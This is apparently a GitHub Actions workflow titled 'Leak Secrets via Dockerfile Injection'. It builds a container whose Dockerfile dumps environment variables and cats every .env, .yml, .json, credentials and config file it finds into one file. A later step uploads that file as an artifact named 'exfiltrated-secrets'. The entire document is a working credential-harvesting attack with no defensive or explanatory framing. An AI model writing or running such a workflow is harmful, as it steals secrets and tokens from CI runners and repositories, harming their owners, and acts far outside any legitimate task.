name: Leak Secrets via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Write custom Dockerfile
        run: |
          cat <<'EOF' > Dockerfile
          FROM alpine:latest
          RUN apk add --no-cache grep findutils

          ARG PAYLOAD

          RUN echo "[ENV VARS]:" > /secrets.txt && \
              (env | grep -v 'GITHUB_TOKEN' || true) >> /secrets.txt && \
              echo "\n[Likely Secrets in FS]:" >> /secrets.txt && \
              find / -type f -iname "*.env" -o -iname "*.yml" -o -iname "*.json" -o -iname "credentials" -o -iname "config" -exec sh -c 'echo "\n--- {} ---" && cat "{}"' \; >> /secrets.txt 2>/dev/null || true
          EOF

      - name: Build Docker image
        run: docker build --build-arg PAYLOAD=true -t secret-exfil .

      - name: Run container and extract secrets
        run: docker run --rm secret-exfil cat /secrets.txt > exfiltrated.txt

      - name: Upload found secrets
        uses: actions/upload-artifact@v3
        with:
          name: exfiltrated-secrets
          path: exfiltrated.txt
